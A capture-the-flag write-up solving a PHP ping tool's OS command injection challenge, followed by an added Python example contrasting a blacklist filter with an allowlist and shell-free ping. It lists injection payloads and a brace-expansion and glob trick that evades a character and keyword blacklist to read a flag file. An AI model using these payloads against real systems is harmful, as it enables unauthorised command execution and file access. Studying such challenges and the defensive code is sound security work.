ICMTC CTF 2023 — International Competition of the Military Technical College

0xM4r5h4l
Jun 13, 2024


Ping Me — OS Command Injection

The PHP script utilizes bash to ping hosts.
At first glance, it appears to be vulnerable to OS Command Injection.

1. Testing a Simple Command Injection
Injected command: 127.0.0.1;ls
Server response: index.php
Result: Command injection successful, confirming the vulnerability.

2. Attempting to Read the File /flag
Injected command: 127.0.0.1;cat /flag
Server response: Flag is forbidden to read!
Result: Access to the flag is restricted.

3. Detection of Forbidden Words
After multiple tests, it was observed that any input containing the word ‘flag’ triggered the server to respond with: Flag is forbidden to read!
The characters &, $, \, and whitespace were detected as a hack.

4. Evading Detection
To bypass detection, the injection was modified as follows: 127.0.0.1;{cat,/f*l*a*g}
Note: 127.0.0.1;{cat,/f*l*a*g} and 127.0.0.1;{cat,/flag} are equivalent.

5. Executing the File
Executed command: 127.0.0.1;/f*l*a*g
Server response: Congratulations, this is the flag location: /tmp/flag_FXLNYL.txt
Result: Successfully located the flag file.

6. Reading the Flag
Injected command: 127.0.0.1;{cat,/tmp/f*l*a*g_FXLNYL.txt}
Server response: EGCERT{3x3cut3_703503_c0Mm@nD$W!th0ut$p@c3s}
Flag obtained: EGCERT{3x3cut3_703503_c0Mm@nD$_W!th0ut_$p@c3s}
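Added example, not part of the writeup and written in Python rather than the challenge's PHP: a blacklist modelled on the filter the writeup describes (the word "flag", the characters &, $, \ and whitespace) next to an allowlist check, plus shell-free invocation of ping. The function names and the hostname pattern are my own assumptions.

```python
"""Why the challenge's blacklist fails and what an allowlist looks like instead."""
import ipaddress
import re
import subprocess

# Blacklist reconstructed from the writeup's description (assumption: the real
# filter may differ in detail): reject the word "flag" and a few shell characters.
FORBIDDEN_WORD = "flag"
FORBIDDEN_CHARS = set("&$\\ \t\n")


def blacklist_allows(host: str) -> bool:
    """True if the challenge-style blacklist would pass this input to the shell."""
    if FORBIDDEN_WORD in host.lower():
        return False
    return not any(c in FORBIDDEN_CHARS for c in host)


# RFC 1123 style hostname: labels of letters, digits and hyphens, no leading or
# trailing hyphen, whole name at most 253 characters.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def allowlist_allows(host: str) -> bool:
    """Accept only a literal IPv4/IPv6 address or a well-formed hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.fullmatch(host) is not None


def ping_command(host: str) -> list:
    """Build ping's argv; the host is one argument and no shell ever parses it."""
    if not allowlist_allows(host):
        raise ValueError(f"rejected host: {host!r}")
    # With an argv list, ';', braces and globs are plain characters to ping,
    # so there is no command boundary for an attacker to cross.
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> str:
    """Validate, then run ping without shell=True; returns combined output."""
    proc = subprocess.run(ping_command(host), capture_output=True,
                          text=True, timeout=10)
    return proc.stdout + proc.stderr
```

Running the writeup's brace-expansion input through both checks shows the difference: the blacklist passes it, the allowlist rejects it.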
